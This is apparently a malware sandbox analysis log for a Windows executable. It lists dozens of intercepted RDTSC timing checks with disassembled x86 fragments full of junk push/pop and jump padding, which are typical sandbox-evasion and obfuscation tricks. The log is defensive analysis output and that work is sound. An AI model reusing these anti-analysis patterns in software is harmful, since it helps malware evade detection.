Source: C:\Users\user\Desktop\OmnqazpM3P.exe	RDTSC instruction interceptor: First address: 993711 second address: 993717 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\OmnqazpM3P.exe	RDTSC instruction interceptor: First address: 993717 second address: 993743 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8D1541FE0Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push edx 0x0000000c jmp 00007F8D1541FE18h 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\OmnqazpM3P.exe	RDTSC instruction interceptor: First address: 993743 second address: 993749 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\OmnqazpM3P.exe	RDTSC instruction interceptor: First address: 99664D second address: 996654 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\OmnqazpM3P.exe	RDTSC instruction interceptor: First address: 996654 second address: 996694 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov dword ptr [esp], eax 0x0000000a push 00000000h 0x0000000c push edx 0x0000000d call 00007F8D15422248h 0x00000012 pop edx 0x00000013 mov dword ptr [esp+04h], edx 0x00000017 add dword ptr [esp+04h], 00000017h 0x0000001f inc edx 0x00000020 push edx 0x00000021 ret 0x00000022 pop edx 0x00000023 ret 0x00000024 push 00000000h 0x00000026 mov edx, dword ptr [ebp+122D2B9Ah] 0x0000002c mov edi, dword ptr [ebp+122D2BDEh] 0x00000032 push 89E57272h 0x00000037 push ecx 0x00000038 pushad 0x00000039 push eax 0x0000003a push edx 0x0000003b rdtsc
Source: C:\Users\user\Desktop\OmnqazpM3P.exe	RDTSC instruction interceptor: First address: 996694 second address: 9966D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007F8D1541FE06h 0x0000000a popad 0x0000000b pop ecx 0x0000000c add dword ptr [esp], 761A8E0Eh 0x00000013 mov si, 4C40h 0x00000017 push 00000003h 0x00000019 pushad 0x0000001a mov di, 8079h 0x0000001e popad 0x0000001f push 00000000h 0x00000021 push 00000003h 0x00000023 jmp 00007F8D1541FE0Eh 0x00000028 call 00007F8D1541FE09h 0x0000002d push eax 0x0000002e push edx 0x0000002f push eax 0x00000030 push edx 0x00000031 pushad 0x00000032 popad 0x00000033 rdtsc
Source: C:\Users\user\Desktop\OmnqazpM3P.exe	RDTSC instruction interceptor: First address: 9966D4 second address: 9966E4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8D1542224Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\OmnqazpM3P.exe	RDTSC instruction interceptor: First address: 9966E4 second address: 9966EA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\OmnqazpM3P.exe	RDTSC instruction interceptor: First address: 9966EA second address: 996706 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8D15422250h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f push ecx 0x00000010 pop ecx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\OmnqazpM3P.exe	RDTSC instruction interceptor: First address: 996706 second address: 99670A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\OmnqazpM3P.exe	RDTSC instruction interceptor: First address: 996804 second address: 996808 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\OmnqazpM3P.exe	RDTSC instruction interceptor: First address: 996906 second address: 996930 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 pushad 0x00000008 jmp 00007F8D1541FE15h 0x0000000d push ebx 0x0000000e push ebx 0x0000000f pop ebx 0x00000010 pop ebx 0x00000011 popad 0x00000012 mov eax, dword ptr [esp+04h] 0x00000016 pushad 0x00000017 pushad 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\OmnqazpM3P.exe	RDTSC instruction interceptor: First address: 996930 second address: 9969C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pushad 0x00000008 push edi 0x00000009 pop edi 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d popad 0x0000000e mov eax, dword ptr [eax] 0x00000010 jng 00007F8D1542225Eh 0x00000016 jmp 00007F8D15422258h 0x0000001b mov dword ptr [esp+04h], eax 0x0000001f jmp 00007F8D15422250h 0x00000024 pop eax 0x00000025 jmp 00007F8D15422257h 0x0000002a lea ebx, dword ptr [ebp+1244B403h] 0x00000030 jmp 00007F8D15422252h 0x00000035 xchg eax, ebx 0x00000036 jmp 00007F8D15422256h 0x0000003b push eax 0x0000003c push eax 0x0000003d push edx 0x0000003e push eax 0x0000003f push edx 0x00000040 jmp 00007F8D1542224Ah 0x00000045 rdtsc
Source: C:\Users\user\Desktop\OmnqazpM3P.exe	RDTSC instruction interceptor: First address: 9969C8 second address: 9969D2 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F8D1541FE06h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\OmnqazpM3P.exe	RDTSC instruction interceptor: First address: 9A7216 second address: 9A7241 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8D1542224Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push ecx 0x0000000a jmp 00007F8D1542224Ah 0x0000000f pop ecx 0x00000010 popad 0x00000011 push eax 0x00000012 push eax 0x00000013 push edx 0x00000014 jnp 00007F8D1542224Ch 0x0000001a rdtsc
Source: C:\Users\user\Desktop\OmnqazpM3P.exe	RDTSC instruction interceptor: First address: 9A7241 second address: 9A7247 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\OmnqazpM3P.exe	RDTSC instruction interceptor: First address: 9A7247 second address: 9A724B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\OmnqazpM3P.exe	RDTSC instruction interceptor: First address: 9B50FB second address: 9B510A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 jmp 00007F8D1541FE0Ah 0x0000000a rdtsc
Source: C:\Users\user\Desktop\OmnqazpM3P.exe	RDTSC instruction interceptor: First address: 9B5413 second address: 9B541D instructions: 0x00000000 rdtsc 0x00000002 jng 00007F8D1542224Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\OmnqazpM3P.exe	RDTSC instruction interceptor: First address: 9B541D second address: 9B5429 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007F8D1541FE12h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\OmnqazpM3P.exe	RDTSC instruction interceptor: First address: 9B604D second address: 9B605C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 push edx 0x00000008 pop edx 0x00000009 jnl 00007F8D15422246h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\OmnqazpM3P.exe	RDTSC instruction interceptor: First address: 9B605C second address: 9B6060 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\OmnqazpM3P.exe	RDTSC instruction interceptor: First address: 9B6060 second address: 9B60A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F8D15422259h 0x0000000b popad 0x0000000c pushad 0x0000000d jmp 00007F8D15422257h 0x00000012 jo 00007F8D15422258h 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\OmnqazpM3P.exe	RDTSC instruction interceptor: First address: 9B6334 second address: 9B6338 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\OmnqazpM3P.exe	RDTSC instruction interceptor: First address: 9B6338 second address: 9B633E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\OmnqazpM3P.exe	RDTSC instruction interceptor: First address: 9B6C51 second address: 9B6C55 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\OmnqazpM3P.exe	RDTSC instruction interceptor: First address: 9BB471 second address: 9BB47B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\OmnqazpM3P.exe	RDTSC instruction interceptor: First address: 9BB47B second address: 9BB481 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\OmnqazpM3P.exe	RDTSC instruction interceptor: First address: 9BC93B second address: 9BC93F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\OmnqazpM3P.exe	RDTSC instruction interceptor: First address: 9BDBEC second address: 9BDBF2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\OmnqazpM3P.exe	RDTSC instruction interceptor: First address: 9C0FA8 second address: 9C0FC0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F8D15422252h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\OmnqazpM3P.exe	RDTSC instruction interceptor: First address: 9C0FC0 second address: 9C1032 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F8D1541FE15h 0x00000008 jmp 00007F8D1541FE0Dh 0x0000000d pushad 0x0000000e popad 0x0000000f jmp 00007F8D1541FE15h 0x00000014 pop edx 0x00000015 pop eax 0x00000016 pushad 0x00000017 pushad 0x00000018 push edx 0x00000019 pop edx 0x0000001a jl 00007F8D1541FE06h 0x00000020 jmp 00007F8D1541FE0Eh 0x00000025 popad 0x00000026 push ebx 0x00000027 pushad 0x00000028 popad 0x00000029 pop ebx 0x0000002a jo 00007F8D1541FE0Ch 0x00000030 jp 00007F8D1541FE06h 0x00000036 push eax 0x00000037 push edx 0x00000038 jmp 00007F8D1541FE19h 0x0000003d rdtsc
Source: C:\Users\user\Desktop\OmnqazpM3P.exe	RDTSC instruction interceptor: First address: 9C1032 second address: 9C103C instructions: 0x00000000 rdtsc 0x00000002 jns 00007F8D15422246h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\OmnqazpM3P.exe	RDTSC instruction interceptor: First address: 9C15E9 second address: 9C15ED instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\OmnqazpM3P.exe	RDTSC instruction interceptor: First address: 9C15ED second address: 9C160A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F8D15422254h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\OmnqazpM3P.exe	RDTSC instruction interceptor: First address: 9C160A second address: 9C1612 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\Desktop\OmnqazpM3P.exe	RDTSC instruction interceptor: First address: 9C1777 second address: 9C1787 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F8D1542224Ah 0x00000008 pushad 0x00000009 popad 0x0000000a pushad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\OmnqazpM3P.exe	RDTSC instruction interceptor: First address: 9C1787 second address: 9C178D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\OmnqazpM3P.exe	RDTSC instruction interceptor: First address: 9C178D second address: 9C1799 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edx 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\OmnqazpM3P.exe	RDTSC instruction interceptor: First address: 9C1799 second address: 9C17B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8D1541FE12h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\OmnqazpM3P.exe	RDTSC instruction interceptor: First address: 9C4D05 second address: 9C4D09 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\OmnqazpM3P.exe	RDTSC instruction interceptor: First address: 9C4DA8 second address: 9C4DAC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\OmnqazpM3P.exe	RDTSC instruction interceptor: First address: 9C5A2C second address: 9C5A5B instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F8D15422248h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d pushad 0x0000000e jno 00007F8D15422248h 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007F8D15422257h 0x0000001b rdtsc
Source: C:\Users\user\Desktop\OmnqazpM3P.exe	RDTSC instruction interceptor: First address: 9C5CCF second address: 9C5CD9 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F8D1541FE06h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\OmnqazpM3P.exe	RDTSC instruction interceptor: First address: 9C5CD9 second address: 9C5CE3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jo 00007F8D15422246h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\OmnqazpM3P.exe	RDTSC instruction interceptor: First address: 9C62DA second address: 9C6353 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F8D1541FE06h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], eax 0x0000000d push 00000000h 0x0000000f push edi 0x00000010 call 00007F8D1541FE08h 0x00000015 pop edi 0x00000016 mov dword ptr [esp+04h], edi 0x0000001a add dword ptr [esp+04h], 00000017h 0x00000022 inc edi 0x00000023 push edi 0x00000024 ret 0x00000025 pop edi 0x00000026 ret 0x00000027 push 00000000h 0x00000029 push 00000000h 0x0000002b push esi 0x0000002c call 00007F8D1541FE08h 0x00000031 pop esi 0x00000032 mov dword ptr [esp+04h], esi 0x00000036 add dword ptr [esp+04h], 00000015h 0x0000003e inc esi 0x0000003f push esi 0x00000040 ret 0x00000041 pop esi 0x00000042 ret 0x00000043 call 00007F8D1541FE12h 0x00000048 pop esi 0x00000049 push 00000000h 0x0000004b mov dword ptr [ebp+122D26ECh], eax 0x00000051 mov dword ptr [ebp+122D1C0Bh], ecx 0x00000057 push eax 0x00000058 push eax 0x00000059 push edx 0x0000005a jmp 00007F8D1541FE0Ah 0x0000005f rdtsc
Source: C:\Users\user\Desktop\OmnqazpM3P.exe	RDTSC instruction interceptor: First address: 9C871E second address: 9C874A instructions: 0x00000000 rdtsc 0x00000002 jno 00007F8D15422248h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b pushad 0x0000000c jmp 00007F8D15422256h 0x00000011 push eax 0x00000012 push edx 0x00000013 jne 00007F8D15422246h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\OmnqazpM3P.exe	RDTSC instruction interceptor: First address: 9C9230 second address: 9C92D8 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F8D1541FE08h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b pushad 0x0000000c jmp 00007F8D1541FE0Dh 0x00000011 jns 00007F8D1541FE0Ch 0x00000017 popad 0x00000018 nop 0x00000019 mov dword ptr [ebp+1244C24Dh], esi 0x0000001f push 00000000h 0x00000021 push 00000000h 0x00000023 push edx 0x00000024 call 00007F8D1541FE08h 0x00000029 pop edx 0x0000002a mov dword ptr [esp+04h], edx 0x0000002e add dword ptr [esp+04h], 0000001Ch 0x00000036 inc edx 0x00000037 push edx 0x00000038 ret 0x00000039 pop edx 0x0000003a ret 0x0000003b mov esi, dword ptr [ebp+122D290Fh] 0x00000041 push 00000000h 0x00000043 push 00000000h 0x00000045 push ebx 0x00000046 call 00007F8D1541FE08h 0x0000004b pop ebx 0x0000004c mov dword ptr [esp+04h], ebx 0x00000050 add dword ptr [esp+04h], 00000017h 0x00000058 inc ebx 0x00000059 push ebx 0x0000005a ret 0x0000005b pop ebx 0x0000005c ret 0x0000005d call 00007F8D1541FE12h 0x00000062 mov di, dx 0x00000065 pop edi 0x00000066 xchg eax, ebx 0x00000067 pushad 0x00000068 pushad 0x00000069 push ebx 0x0000006a pop ebx 0x0000006b jmp 00007F8D1541FE0Dh 0x00000070 popad 0x00000071 push edx 0x00000072 push eax 0x00000073 push edx 0x00000074 rdtsc
Source: C:\Users\user\Desktop\OmnqazpM3P.exe	RDTSC instruction interceptor: First address: 9CA8BD second address: 9CA8C1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\OmnqazpM3P.exe	RDTSC instruction interceptor: First address: 9CA8C1 second address: 9CA8D3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 jno 00007F8D1541FE18h 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\OmnqazpM3P.exe	RDTSC instruction interceptor: First address: 9CA8D3 second address: 9CA8D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\OmnqazpM3P.exe	RDTSC instruction interceptor: First address: 9CB454 second address: 9CB46B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F8D1541FE12h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\OmnqazpM3P.exe	RDTSC instruction interceptor: First address: 9CB46B second address: 9CB4FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 pushad 0x00000009 pushad 0x0000000a jmp 00007F8D15422252h 0x0000000f jmp 00007F8D1542224Ch 0x00000014 popad 0x00000015 jmp 00007F8D1542224Ah 0x0000001a popad 0x0000001b nop 0x0000001c push 00000000h 0x0000001e push edx 0x0000001f call 00007F8D15422248h 0x00000024 pop edx 0x00000025 mov dword ptr [esp+04h], edx 0x00000029 add dword ptr [esp+04h], 0000001Bh 0x00000031 inc edx 0x00000032 push edx 0x00000033 ret 0x00000034 pop edx 0x00000035 ret 0x00000036 push 00000000h 0x00000038 mov esi, ebx 0x0000003a push 00000000h 0x0000003c push 00000000h 0x0000003e push ecx 0x0000003f call 00007F8D15422248h 0x00000044 pop ecx 0x00000045 mov dword ptr [esp+04h], ecx 0x00000049 add dword ptr [esp+04h], 00000017h 0x00000051 inc ecx 0x00000052 push ecx 0x00000053 ret 0x00000054 pop ecx 0x00000055 ret 0x00000056 jmp 00007F8D1542224Fh 0x0000005b push eax 0x0000005c push esi 0x0000005d push eax 0x0000005e push edx 0x0000005f push ebx 0x00000060 pop ebx 0x00000061 rdtsc
Source: C:\Users\user\Desktop\OmnqazpM3P.exe	RDTSC instruction interceptor: First address: 9CDB98 second address: 9CDB9C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\OmnqazpM3P.exe	RDTSC instruction interceptor: First address: 9CE0E7 second address: 9CE0EC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\OmnqazpM3P.exe	RDTSC instruction interceptor: First address: 9CF01A second address: 9CF01E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\OmnqazpM3P.exe	RDTSC instruction interceptor: First address: 9CF01E second address: 9CF02C instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\OmnqazpM3P.exe	RDTSC instruction interceptor: First address: 9CF02C second address: 9CF032 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\OmnqazpM3P.exe	RDTSC instruction interceptor: First address: 9CF032 second address: 9CF038 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\OmnqazpM3P.exe	RDTSC instruction interceptor: First address: 9CFFFD second address: 9D0002 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\OmnqazpM3P.exe	RDTSC instruction interceptor: First address: 9D20EB second address: 9D20F5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jp 00007F8D15422246h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\OmnqazpM3P.exe	RDTSC instruction interceptor: First address: 9D33B2 second address: 9D33C5 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d jp 00007F8D1541FE06h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\OmnqazpM3P.exe	RDTSC instruction interceptor: First address: 9D33C5 second address: 9D33D3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8D1542224Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\OmnqazpM3P.exe	RDTSC instruction interceptor: First address: 9D5352 second address: 9D5356 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\OmnqazpM3P.exe	RDTSC instruction interceptor: First address: 9D5356 second address: 9D5375 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F8D15422255h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\OmnqazpM3P.exe	RDTSC instruction interceptor: First address: 9D5375 second address: 9D537C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\OmnqazpM3P.exe	RDTSC instruction interceptor: First address: 9D537C second address: 9D53C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 nop 0x00000008 mov edi, dword ptr [ebp+122D2B9Ah] 0x0000000e mov dword ptr [ebp+122D288Fh], eax 0x00000014 push 00000000h 0x00000016 mov dword ptr [ebp+122D1823h], eax 0x0000001c push 00000000h 0x0000001e push 00000000h 0x00000020 push ecx 0x00000021 call 00007F8D15422248h 0x00000026 pop ecx 0x00000027 mov dword ptr [esp+04h], ecx 0x0000002b add dword ptr [esp+04h], 00000018h 0x00000033 inc ecx 0x00000034 push ecx 0x00000035 ret 0x00000036 pop ecx 0x00000037 ret 0x00000038 mov bl, dh 0x0000003a mov edi, dword ptr [ebp+122D29E2h] 0x00000040 xchg eax, esi 0x00000041 push ebx 0x00000042 push eax 0x00000043 push edx 0x00000044 pushad 0x00000045 popad 0x00000046 rdtsc
Source: C:\Users\user\Desktop\OmnqazpM3P.exe	RDTSC instruction interceptor: First address: 9C9BB5 second address: 9C9BBA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
Source: C:\Users\user\Desktop\OmnqazpM3P.exe	RDTSC instruction interceptor: First address: 9C9BBA second address: 9C9BE5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F8D15422251h 0x00000008 jmp 00007F8D1542224Eh 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push ebx 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\OmnqazpM3P.exe	RDTSC instruction interceptor: First address: 9C9BE5 second address: 9C9BE9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\OmnqazpM3P.exe	RDTSC instruction interceptor: First address: 9D6361 second address: 9D6368 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\OmnqazpM3P.exe	RDTSC instruction interceptor: First address: 9D6368 second address: 9D6372 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnl 00007F8D1541FE06h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\OmnqazpM3P.exe	RDTSC instruction interceptor: First address: 9D9532 second address: 9D9536 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\OmnqazpM3P.exe	RDTSC instruction interceptor: First address: 9D9536 second address: 9D953C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\OmnqazpM3P.exe	RDTSC instruction interceptor: First address: 9D953C second address: 9D9542 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\OmnqazpM3P.exe	RDTSC instruction interceptor: First address: 9D9542 second address: 9D9571 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8D1541FE16h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F8D1541FE10h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\OmnqazpM3P.exe	RDTSC instruction interceptor: First address: 9D9571 second address: 9D95EE instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push edx 0x00000004 pop edx 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 push 00000000h 0x0000000b push ecx 0x0000000c call 00007F8D15422248h 0x00000011 pop ecx 0x00000012 mov dword ptr [esp+04h], ecx 0x00000016 add dword ptr [esp+04h], 00000018h 0x0000001e inc ecx 0x0000001f push ecx 0x00000020 ret 0x00000021 pop ecx 0x00000022 ret 0x00000023 or dword ptr [ebp+1244B12Ch], ecx 0x00000029 push 00000000h 0x0000002b mov bh, cl 0x0000002d push 00000000h 0x0000002f push 00000000h 0x00000031 push ecx 0x00000032 call 00007F8D15422248h 0x00000037 pop ecx 0x00000038 mov dword ptr [esp+04h], ecx 0x0000003c add dword ptr [esp+04h], 0000001Dh 0x00000044 inc ecx 0x00000045 push ecx 0x00000046 ret 